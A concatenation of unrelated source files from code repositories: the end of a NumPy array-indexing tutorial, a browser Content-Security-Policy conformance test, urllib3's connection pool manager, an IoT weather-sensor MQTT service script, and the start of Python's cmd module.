>>> x
array([10, 9, 8, 7, 6, 5, 4, 3, 2])
>>> x[np.array([3, 3, 1, 8])]
array([7, 7, 9, 2])
The index array consisting of the values 3, 3, 1 and 8 correspondingly
create an array of length 4 (same as the index array) where each index
is replaced by the value the index array has in the array being indexed.
Negative values are permitted and work as they do with single indices
or slices: ::
>>> x[np.array([3,3,-3,8])]
array([7, 7, 4, 2])
It is an error to have index values out of bounds: ::
>>> x[np.array([3, 3, 20, 8])]
<type 'exceptions.IndexError'>: index 20 out of bounds 0<=index<9
Generally speaking, what is returned when index arrays are used is
an array with the same shape as the index array, but with the type
and values of the array being indexed. As an example, we can use a
multidimensional index array instead: ::
>>> x[np.array([[1,1],[2,3]])]
array([[9, 9],
[8, 7]])
Indexing Multi-dimensional arrays
=================================
Things become more complex when multidimensional arrays are indexed,
particularly with multidimensional index arrays. These tend to be
more unusal uses, but theyare permitted, and they are useful for some
problems. We'll start with thesimplest multidimensional case (using
the array y from the previous examples): ::
>>> y[np.array([0,2,4]), np.array([0,1,2])]
array([ 0, 15, 30])
In this case, if the index arrays have a matching shape, and there is
an index array for each dimension of the array being indexed, the
resultant array has the same shape as the index arrays, and the values
correspond to the index set for each position in the index arrays. In
this example, the first index value is 0 for both index arrays, and
thus the first value of the resultant array is y[0,0]. The next value
is y[2,1], and the last is y[4,2].
If the index arrays do not have the same shape, there is an attempt to
broadcast them to the same shape. If they cannot be broadcast to the
same shape, an exception is raised: ::
>>> y[np.array([0,2,4]), np.array([0,1])]
<type 'exceptions.ValueError'>: shape mismatch: objects cannot be
broadcast to a single shape
The broadcasting mechanism permits index arrays to be combined with
scalars for other indices. The effect is that the scalar value is used
for all the corresponding values of the index arrays: ::
>>> y[np.array([0,2,4]), 1]
array([ 1, 15, 29])
Jumping to the next level of complexity, it is possible to only
partially index an array with index arrays. It takes a bit of thought
to understand what happens in such cases. For example if we just use
one index array with y: ::
>>> y[np.array([0,2,4])]
array([[ 0, 1, 2, 3, 4, 5, 6],
[14, 15, 16, 17, 18, 19, 20],
[28, 29, 30, 31, 32, 33, 34]])
What results is the construction of a new array where each value of
the index array selects one row from the array being indexed and the
resultant array has the resulting shape (size of row, number index
elements).
An example of where this may be useful is for a color lookup table
where we want to map the values of an image into RGB triples for
display. The lookup table could have a shape (nlookup, 3). Indexing
such an array with an image with shape (ny, nx) with dtype=np.uint8
(or any integer type so long as values are with the bounds of the
lookup table) will result in an array of shape (ny, nx, 3) where a
triple of RGB values is associated with each pixel location.
In general, the shape of the resulant array will be the concatenation
of the shape of the index array (or the shape that all the index arrays
were broadcast to) with the shape of any unused dimensions (those not
indexed) in the array being indexed.
Boolean or "mask" index arrays
==============================
Boolean arrays used as indices are treated in a different manner
entirely than index arrays. Boolean arrays must be of the same shape
as the initial dimensions of the array being indexed. In the
most straightforward case, the boolean array has the same shape: ::
>>> b = y>20
>>> y[b]
array([21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34])
The result is a 1-D array containing all the elements in the indexed
array corresponding to all the true elements in the boolean array. As
with index arrays, what is returned is a copy of the data, not a view
as one gets with slices.
The result will be multidimensional if y has more dimensions than b.
For example: ::
>>> b[:,5] # use a 1-D boolean whose first dim agrees with the first dim of y
array([False, False, False, True, True], dtype=bool)
>>> y[b[:,5]]
array([[21, 22, 23, 24, 25, 26, 27],
[28, 29, 30, 31, 32, 33, 34]])
Here the 4th and 5th rows are selected from the indexed array and
combined to make a 2-D array.
In general, when the boolean array has fewer dimensions than the array
being indexed, this is equivalent to y[b, ...], which means
y is indexed by b followed by as many : as are needed to fill
out the rank of y.
Thus the shape of the result is one dimension containing the number
of True elements of the boolean array, followed by the remaining
dimensions of the array being indexed.
For example, using a 2-D boolean array of shape (2,3)
with four True elements to select rows from a 3-D array of shape
(2,3,5) results in a 2-D result of shape (4,5): ::
>>> x = np.arange(30).reshape(2,3,5)
>>> x
array([[[ 0, 1, 2, 3, 4],
[ 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14]],
[[15, 16, 17, 18, 19],
[20, 21, 22, 23, 24],
[25, 26, 27, 28, 29]]])
>>> b = np.array([[True, True, False], [False, True, True]])
>>> x[b]
array([[ 0, 1, 2, 3, 4],
[ 5, 6, 7, 8, 9],
[20, 21, 22, 23, 24],
[25, 26, 27, 28, 29]])
For further details, consult the numpy reference documentation on array indexing.
Combining index arrays with slices
==================================
Index arrays may be combined with slices. For example: ::
>>> y[np.array([0,2,4]),1:3]
array([[ 1, 2],
[15, 16],
[29, 30]])
In effect, the slice is converted to an index array
np.array([[1,2]]) (shape (1,2)) that is broadcast with the index array
to produce a resultant array of shape (3,2).
Likewise, slicing can be combined with broadcasted boolean indices: ::
>>> y[b[:,5],1:3]
array([[22, 23],
[29, 30]])
Structural indexing tools
=========================
To facilitate easy matching of array shapes with expressions and in
assignments, the np.newaxis object can be used within array indices
to add new dimensions with a size of 1. For example: ::
>>> y.shape
(5, 7)
>>> y[:,np.newaxis,:].shape
(5, 1, 7)
Note that there are no new elements in the array, just that the
dimensionality is increased. This can be handy to combine two
arrays in a way that otherwise would require explicitly reshaping
operations. For example: ::
>>> x = np.arange(5)
>>> x[:,np.newaxis] + x[np.newaxis,:]
array([[0, 1, 2, 3, 4],
[1, 2, 3, 4, 5],
[2, 3, 4, 5, 6],
[3, 4, 5, 6, 7],
[4, 5, 6, 7, 8]])
The ellipsis syntax maybe used to indicate selecting in full any
remaining unspecified dimensions. For example: ::
>>> z = np.arange(81).reshape(3,3,3,3)
>>> z[1,...,2]
array([[29, 32, 35],
[38, 41, 44],
[47, 50, 53]])
This is equivalent to: ::
>>> z[1,:,:,2]
array([[29, 32, 35],
[38, 41, 44],
[47, 50, 53]])
Assigning values to indexed arrays
==================================
As mentioned, one can select a subset of an array to assign to using
a single index, slices, and index and mask arrays. The value being
assigned to the indexed array must be shape consistent (the same shape
or broadcastable to the shape the index produces). For example, it is
permitted to assign a constant to a slice: ::
>>> x = np.arange(10)
>>> x[2:7] = 1
or an array of the right size: ::
>>> x[2:7] = np.arange(5)
Note that assignments may result in changes if assigning
higher types to lower types (like floats to ints) or even
exceptions (assigning complex to floats or ints): ::
>>> x[1] = 1.2
>>> x[1]
1
>>> x[1] = 1.2j
<type 'exceptions.TypeError'>: can't convert complex to long; use
long(abs(z))
Unlike some of the references (such as array and mask indices)
assignments are always made to the original data in the array
(indeed, nothing else would make sense!). Note though, that some
actions may not work as one may naively expect. This particular
example is often surprising to people: ::
>>> x = np.arange(0, 50, 10)
>>> x
array([ 0, 10, 20, 30, 40])
>>> x[np.array([1, 1, 3, 1])] += 1
>>> x
array([ 0, 11, 20, 31, 40])
Where people expect that the 1st location will be incremented by 3.
In fact, it will only be incremented by 1. The reason is because
a new array is extracted from the original (as a temporary) containing
the values at 1, 1, 3, 1, then the value 1 is added to the temporary,
and then the temporary is assigned back to the original array. Thus
the value of the array at x[1]+1 is assigned to x[1] three times,
rather than being incremented 3 times.
Dealing with variable numbers of indices within programs
========================================================
The index syntax is very powerful but limiting when dealing with
a variable number of indices. For example, if you want to write
a function that can handle arguments with various numbers of
dimensions without having to write special case code for each
number of possible dimensions, how can that be done? If one
supplies to the index a tuple, the tuple will be interpreted
as a list of indices. For example (using the previous definition
for the array z): ::
>>> indices = (1,1,1,1)
>>> z[indices]
40
So one can use code to construct tuples of any number of indices
and then use these within an index.
Slices can be specified within programs by using the slice() function
in Python. For example: ::
>>> indices = (1,1,1,slice(0,2)) # same as [1,1,1,0:2]
>>> z[indices]
array([39, 40])
Likewise, ellipsis can be specified by code by using the Ellipsis
object: ::
>>> indices = (1, Ellipsis, 1) # same as [1,...,1]
>>> z[indices]
array([[28, 31, 34],
[37, 40, 43],
[46, 49, 52]])
For this reason it is possible to use the output from the np.where()
function directly as an index since it always returns a tuple of index
arrays.
Because the special treatment of tuples, they are not automatically
converted to an array as a list would be. As an example: ::
>>> z[[1,1,1,1]] # produces a large array
array([[[[27, 28, 29],
[30, 31, 32], ...
>>> z[(1,1,1,1)] # returns a single value
40
"""
from __future__ import division, absolute_import, print_function
| agpl-3.0 |
haoxli/web-testing-service | wts/tests/csp/csp_object-src_cross-origin_multi_blocked_int-manual.py | 30 | 2479 | def main(request, response):
import simplejson as json
f = file('config.json')
source = f.read()
s = json.JSONDecoder().decode(source)
url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
url2 = "http://" + s['host'] + ":" + str(s['ports']['http'][0])
_CSP = "object-src " + url2 + " https://tizen.org"
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_object-src_cross-origin_multi_blocked_int</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#object-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
</head>
<body>
<p>Test passes if there is <strong>no red</strong>.</p>
<object data="support/red-100x100.png"/>
</body>
</html> """
| bsd-3-clause |
huguesv/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/pip/_vendor/urllib3/poolmanager.py | 37 | 16853 | from __future__ import absolute_import
import collections
import functools
import logging
from ._collections import RecentlyUsedContainer
from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool
from .connectionpool import port_by_scheme
from .exceptions import LocationValueError, MaxRetryError, ProxySchemeUnknown
from .packages.six.moves.urllib.parse import urljoin
from .request import RequestMethods
from .util.url import parse_url
from .util.retry import Retry
__all__ = ['PoolManager', 'ProxyManager', 'proxy_from_url']
log = logging.getLogger(__name__)
SSL_KEYWORDS = ('key_file', 'cert_file', 'cert_reqs', 'ca_certs',
'ssl_version', 'ca_cert_dir', 'ssl_context')
# All known keyword arguments that could be provided to the pool manager, its
# pools, or the underlying connections. This is used to construct a pool key.
_key_fields = (
'key_scheme', # str
'key_host', # str
'key_port', # int
'key_timeout', # int or float or Timeout
'key_retries', # int or Retry
'key_strict', # bool
'key_block', # bool
'key_source_address', # str
'key_key_file', # str
'key_cert_file', # str
'key_cert_reqs', # str
'key_ca_certs', # str
'key_ssl_version', # str
'key_ca_cert_dir', # str
'key_ssl_context', # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext
'key_maxsize', # int
'key_headers', # dict
'key__proxy', # parsed proxy url
'key__proxy_headers', # dict
'key_socket_options', # list of (level (int), optname (int), value (int or str)) tuples
'key__socks_options', # dict
'key_assert_hostname', # bool or string
'key_assert_fingerprint', # str
'key_server_hostname', #str
)
#: The namedtuple class used to construct keys for the connection pool.
#: All custom key schemes should include the fields in this key at a minimum.
PoolKey = collections.namedtuple('PoolKey', _key_fields)
def _default_key_normalizer(key_class, request_context):
"""
Create a pool key out of a request context dictionary.
According to RFC 3986, both the scheme and host are case-insensitive.
Therefore, this function normalizes both before constructing the pool
key for an HTTPS request. If you wish to change this behaviour, provide
alternate callables to ``key_fn_by_scheme``.
:param key_class:
The class to use when constructing the key. This should be a namedtuple
with the ``scheme`` and ``host`` keys at a minimum.
:type key_class: namedtuple
:param request_context:
A dictionary-like object that contain the context for a request.
:type request_context: dict
:return: A namedtuple that can be used as a connection pool key.
:rtype: PoolKey
"""
# Since we mutate the dictionary, make a copy first
context = request_context.copy()
context['scheme'] = context['scheme'].lower()
context['host'] = context['host'].lower()
# These are both dictionaries and need to be transformed into frozensets
for key in ('headers', '_proxy_headers', '_socks_options'):
if key in context and context[key] is not None:
context[key] = frozenset(context[key].items())
# The socket_options key may be a list and needs to be transformed into a
# tuple.
socket_opts = context.get('socket_options')
if socket_opts is not None:
context['socket_options'] = tuple(socket_opts)
# Map the kwargs to the names in the namedtuple - this is necessary since
# namedtuples can't have fields starting with '_'.
for key in list(context.keys()):
context['key_' + key] = context.pop(key)
# Default to ``None`` for keys missing from the context
for field in key_class._fields:
if field not in context:
context[field] = None
return key_class(**context)
#: A dictionary that maps a scheme to a callable that creates a pool key.
#: This can be used to alter the way pool keys are constructed, if desired.
#: Each PoolManager makes a copy of this dictionary so they can be configured
#: globally here, or individually on the instance.
key_fn_by_scheme = {
'http': functools.partial(_default_key_normalizer, PoolKey),
'https': functools.partial(_default_key_normalizer, PoolKey),
}
pool_classes_by_scheme = {
'http': HTTPConnectionPool,
'https': HTTPSConnectionPool,
}
class PoolManager(RequestMethods):
"""
Allows for arbitrary requests while transparently keeping track of
necessary connection pools for you.
:param num_pools:
Number of connection pools to cache before discarding the least
recently used pool.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param \\**connection_pool_kw:
Additional parameters are used to create fresh
:class:`urllib3.connectionpool.ConnectionPool` instances.
Example::
>>> manager = PoolManager(num_pools=2)
>>> r = manager.request('GET', 'http://google.com/')
>>> r = manager.request('GET', 'http://google.com/mail')
>>> r = manager.request('GET', 'http://yahoo.com/')
>>> len(manager.pools)
2
"""
proxy = None
def __init__(self, num_pools=10, headers=None, **connection_pool_kw):
RequestMethods.__init__(self, headers)
self.connection_pool_kw = connection_pool_kw
self.pools = RecentlyUsedContainer(num_pools,
dispose_func=lambda p: p.close())
# Locally set the pool classes and keys so other PoolManagers can
# override them.
self.pool_classes_by_scheme = pool_classes_by_scheme
self.key_fn_by_scheme = key_fn_by_scheme.copy()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.clear()
# Return False to re-raise any potential exceptions
return False
def _new_pool(self, scheme, host, port, request_context=None):
"""
Create a new :class:`ConnectionPool` based on host, port, scheme, and
any additional pool keyword arguments.
If ``request_context`` is provided, it is provided as keyword arguments
to the pool class used. This method is used to actually create the
connection pools handed out by :meth:`connection_from_url` and
companion methods. It is intended to be overridden for customization.
"""
pool_cls = self.pool_classes_by_scheme[scheme]
if request_context is None:
request_context = self.connection_pool_kw.copy()
# Although the context has everything necessary to create the pool,
# this function has historically only used the scheme, host, and port
# in the positional args. When an API change is acceptable these can
# be removed.
for key in ('scheme', 'host', 'port'):
request_context.pop(key, None)
if scheme == 'http':
for kw in SSL_KEYWORDS:
request_context.pop(kw, None)
return pool_cls(host, port, **request_context)
def clear(self):
"""
Empty our store of pools and direct them all to close.
This will not affect in-flight connections, but they will not be
re-used after completion.
"""
self.pools.clear()
def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
"""
Get a :class:`ConnectionPool` based on the host, port, and scheme.
If ``port`` isn't given, it will be derived from the ``scheme`` using
``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is
provided, it is merged with the instance's ``connection_pool_kw``
variable and used to create the new connection pool, if one is
needed.
"""
if not host:
raise LocationValueError("No host specified.")
request_context = self._merge_pool_kwargs(pool_kwargs)
request_context['scheme'] = scheme or 'http'
if not port:
port = port_by_scheme.get(request_context['scheme'].lower(), 80)
request_context['port'] = port
request_context['host'] = host
return self.connection_from_context(request_context)
def connection_from_context(self, request_context):
"""
Get a :class:`ConnectionPool` based on the request context.
``request_context`` must at least contain the ``scheme`` key and its
value must be a key in ``key_fn_by_scheme`` instance variable.
"""
scheme = request_context['scheme'].lower()
pool_key_constructor = self.key_fn_by_scheme[scheme]
pool_key = pool_key_constructor(request_context)
return self.connection_from_pool_key(pool_key, request_context=request_context)
def connection_from_pool_key(self, pool_key, request_context=None):
"""
Get a :class:`ConnectionPool` based on the provided pool key.
``pool_key`` should be a namedtuple that only contains immutable
objects. At a minimum it must have the ``scheme``, ``host``, and
``port`` fields.
"""
with self.pools.lock:
# If the scheme, host, or port doesn't match existing open
# connections, open a new ConnectionPool.
pool = self.pools.get(pool_key)
if pool:
return pool
# Make a fresh ConnectionPool of the desired type
scheme = request_context['scheme']
host = request_context['host']
port = request_context['port']
pool = self._new_pool(scheme, host, port, request_context=request_context)
self.pools[pool_key] = pool
return pool
def connection_from_url(self, url, pool_kwargs=None):
"""
Similar to :func:`urllib3.connectionpool.connection_from_url`.
If ``pool_kwargs`` is not provided and a new pool needs to be
constructed, ``self.connection_pool_kw`` is used to initialize
the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs``
is provided, it is used instead. Note that if a new pool does not
need to be created for the request, the provided ``pool_kwargs`` are
not used.
"""
u = parse_url(url)
return self.connection_from_host(u.host, port=u.port, scheme=u.scheme,
pool_kwargs=pool_kwargs)
def _merge_pool_kwargs(self, override):
"""
Merge a dictionary of override values for self.connection_pool_kw.
This does not modify self.connection_pool_kw and returns a new dict.
Any keys in the override dictionary with a value of ``None`` are
removed from the merged dictionary.
"""
base_pool_kwargs = self.connection_pool_kw.copy()
if override:
for key, value in override.items():
if value is None:
try:
del base_pool_kwargs[key]
except KeyError:
pass
else:
base_pool_kwargs[key] = value
return base_pool_kwargs
def urlopen(self, method, url, redirect=True, **kw):
"""
Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`
with custom cross-host redirect logic and only sends the request-uri
portion of the ``url``.
The given ``url`` parameter must be absolute, such that an appropriate
:class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.
"""
u = parse_url(url)
conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)
kw['assert_same_host'] = False
kw['redirect'] = False
if 'headers' not in kw:
kw['headers'] = self.headers.copy()
if self.proxy is not None and u.scheme == "http":
response = conn.urlopen(method, url, **kw)
else:
response = conn.urlopen(method, u.request_uri, **kw)
redirect_location = redirect and response.get_redirect_location()
if not redirect_location:
return response
# Support relative URLs for redirecting.
redirect_location = urljoin(url, redirect_location)
# RFC 7231, Section 6.4.4
if response.status == 303:
method = 'GET'
retries = kw.get('retries')
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect)
# Strip headers marked as unsafe to forward to the redirected location.
# Check remove_headers_on_redirect to avoid a potential network call within
# conn.is_same_host() which may use socket.gethostbyname() in the future.
if (retries.remove_headers_on_redirect
and not conn.is_same_host(redirect_location)):
for header in retries.remove_headers_on_redirect:
kw['headers'].pop(header, None)
try:
retries = retries.increment(method, url, response=response, _pool=conn)
except MaxRetryError:
if retries.raise_on_redirect:
raise
return response
kw['retries'] = retries
kw['redirect'] = redirect
log.info("Redirecting %s -> %s", url, redirect_location)
return self.urlopen(method, redirect_location, **kw)
class ProxyManager(PoolManager):
"""
Behaves just like :class:`PoolManager`, but sends all requests through
the defined proxy, using the CONNECT method for HTTPS URLs.
:param proxy_url:
The URL of the proxy to be used.
:param proxy_headers:
A dictionary containing headers that will be sent to the proxy. In case
of HTTP they are being sent with each request, while in the
HTTPS/CONNECT case they are sent only once. Could be used for proxy
authentication.
Example:
>>> proxy = urllib3.ProxyManager('http://localhost:3128/')
>>> r1 = proxy.request('GET', 'http://google.com/')
>>> r2 = proxy.request('GET', 'http://httpbin.org/')
>>> len(proxy.pools)
1
>>> r3 = proxy.request('GET', 'https://httpbin.org/')
>>> r4 = proxy.request('GET', 'https://twitter.com/')
>>> len(proxy.pools)
3
"""
def __init__(self, proxy_url, num_pools=10, headers=None,
proxy_headers=None, **connection_pool_kw):
if isinstance(proxy_url, HTTPConnectionPool):
proxy_url = '%s://%s:%i' % (proxy_url.scheme, proxy_url.host,
proxy_url.port)
proxy = parse_url(proxy_url)
if not proxy.port:
port = port_by_scheme.get(proxy.scheme, 80)
proxy = proxy._replace(port=port)
if proxy.scheme not in ("http", "https"):
raise ProxySchemeUnknown(proxy.scheme)
self.proxy = proxy
self.proxy_headers = proxy_headers or {}
connection_pool_kw['_proxy'] = self.proxy
connection_pool_kw['_proxy_headers'] = self.proxy_headers
super(ProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw)
def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
if scheme == "https":
return super(ProxyManager, self).connection_from_host(
host, port, scheme, pool_kwargs=pool_kwargs)
return super(ProxyManager, self).connection_from_host(
self.proxy.host, self.proxy.port, self.proxy.scheme, pool_kwargs=pool_kwargs)
def _set_proxy_headers(self, url, headers=None):
"""
Sets headers needed by proxies: specifically, the Accept and Host
headers. Only sets headers not provided by the user.
"""
headers_ = {'Accept': '*/*'}
netloc = parse_url(url).netloc
if netloc:
headers_['Host'] = netloc
if headers:
headers_.update(headers)
return headers_
def urlopen(self, method, url, redirect=True, **kw):
"Same as HTTP(S)ConnectionPool.urlopen, ``url`` must be absolute."
u = parse_url(url)
if u.scheme == "http":
# For proxied HTTPS requests, httplib sets the necessary headers
# on the CONNECT to the proxy. For HTTP, we'll definitely
# need to set 'Host' at the very least.
headers = kw.get('headers', self.headers)
kw['headers'] = self._set_proxy_headers(url, headers)
return super(ProxyManager, self).urlopen(method, url, redirect=redirect, **kw)
def proxy_from_url(url, **kw):
return ProxyManager(proxy_url=url, **kw)
| apache-2.0 |
connectIOT/iottoolkit | old/WeatherSensorMQTTSubscriber.py | 1 | 10322 | '''
Created on July 26, 2013
Example service created for a weather sensor. An Arduino POSTs simple JSON value-only updates to the
REST endpoints defined by the Observable Property created for each sensor output. An example graph is
created to demonstrate how endpoints can be discovered by reading the graph meta data
@author: mjkoster
'''
from core.SmartObject import SmartObject
from core.Description import Description
from core.ObservableProperty import ObservableProperty
from core.Observers import Observers
from core.PropertyOfInterest import PropertyOfInterest
from rdflib.term import Literal, URIRef
from rdflib.namespace import RDF, RDFS, XSD, OWL
from interfaces.HttpObjectService import HttpObjectService
from interfaces.CoapObjectService import CoapObjectService
from time import sleep
import sys
#workaround to register rdf JSON plugins
import rdflib
from rdflib.plugin import Serializer, Parser
rdflib.plugin.register('json-ld', Serializer, 'rdflib_jsonld.serializer', 'JsonLDSerializer')
rdflib.plugin.register('json-ld', Parser, 'rdflib_jsonld.parser', 'JsonLDParser')
rdflib.plugin.register('rdf-json', Serializer, 'rdflib_rdfjson.rdfjson_serializer', 'RdfJsonSerializer')
rdflib.plugin.register('rdf-json', Parser, 'rdflib_rdfjson.rdfjson_parser', 'RdfJsonParser')
if __name__ == '__main__' :
baseObject = HttpObjectService().baseObject # make an instance of the service, default object root and default port 8000
coapService = CoapObjectService(baseObject)
# create the weather station resource template
# emulate the .well-known/core interface
baseObject.create({'resourceName': '.well-known','resourceClass': 'SmartObject'},\
).create({'resourceName': 'core','resourceClass': 'LinkFormatProxy'})
# sensors resource under the baseObject for all sensors
# top level object container for sensors, default class is SmartObject
sensors = baseObject.create({'resourceName': 'sensors', 'resourceClass': 'SmartObject'})
#weather resource under sensors for the weather sensor
# create a default class SmartObject for the weather sensor cluster
weather = sensors.create({'resourceName': 'rhvWeather-01', 'resourceClass': 'SmartObject'})
# example description in simple link-format like concepts
baseObject.Description.set((URIRef('sensors/rhvWeather-01'), RDFS.Class, Literal('SmartObject')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01'), RDF.type, Literal('SensorSystem')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01'), RDFS.Resource, Literal('Weather')))
#
baseObject.Description.set((URIRef('sensors/rhvWeather-01/outdoor_temperature'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/outdoor_temperature'), RDFS.Resource, Literal('temperature')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/outdoor_humidity'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/outdoor_humidity'), RDFS.Resource, Literal('humidity')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/sealevel_pressure'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/sealevel_pressure'), RDFS.Resource, Literal('pressure')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/indoor_temperature'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/indoor_temperature'), RDFS.Resource, Literal('temperature')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/indoor_humidity'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/indoor_humidity'), RDFS.Resource, Literal('humidity')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/wind_gust'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/wind_gust'), RDFS.Resource, Literal('speed')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/wind_speed'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/wind_speed'), RDFS.Resource, Literal('speed')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/wind_direction'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/wind_direction'), RDFS.Resource, Literal('direction')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/current_rain'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/current_rain'), RDFS.Resource, Literal('depth')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/hourly_rain'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/hourly_rain'), RDFS.Resource, Literal('depth')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/daily_rain'), RDF.type, Literal('sensor')))
baseObject.Description.set((URIRef('sensors/rhvWeather-01/daily_rain'), RDFS.Resource, Literal('depth')))
# now create an Observable Property for each sensor output
pushInterval = 10 # number of samples to delay each push to Xively
outdoor_temperature = weather.create({'resourceName': 'outdoor_temperature',\
'resourceClass': 'ObservableProperty'})
outdoor_temperature.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
outdoor_humidity = weather.create({'resourceName': 'outdoor_humidity',\
'resourceClass': 'ObservableProperty'})
outdoor_humidity.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
sealevel_pressure = weather.create({'resourceName': 'sealevel_pressure',\
'resourceClass': 'ObservableProperty'})
sealevel_pressure.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
indoor_temperature = weather.create({'resourceName': 'indoor_temperature',\
'resourceClass': 'ObservableProperty'})
indoor_temperature.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
indoor_humidity = weather.create({'resourceName': 'indoor_humidity',\
'resourceClass': 'ObservableProperty'})
indoor_humidity.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
wind_gust = weather.create({'resourceName': 'wind_gust',\
'resourceClass': 'ObservableProperty'})
wind_gust.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
wind_speed = weather.create({'resourceName': 'wind_speed',\
'resourceClass': 'ObservableProperty'})
wind_speed.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
wind_direction = weather.create({'resourceName': 'wind_direction',\
'resourceClass': 'ObservableProperty'})
wind_direction.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
current_rain = weather.create({'resourceName': 'current_rain',\
'resourceClass': 'ObservableProperty'})
current_rain.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
hourly_rain = weather.create({'resourceName': 'hourly_rain',\
'resourceClass': 'ObservableProperty'})
hourly_rain.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
daily_rain = weather.create({'resourceName': 'daily_rain',\
'resourceClass': 'ObservableProperty'})
daily_rain.Observers.create({'resourceName': 'mqttTestObserver',\
'resourceClass': 'mqttObserver',\
'connection': 'smartobjectservice.com',\
'pubTopic': ''})
try:
# register handlers etc.
while 1: sleep(1)
except KeyboardInterrupt: pass
print 'got KeyboardInterrupt'
| apache-2.0 |
figment/falloutsnip | Vendor/IronPython/Lib/cmd.py | 86 | 14889 | """A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
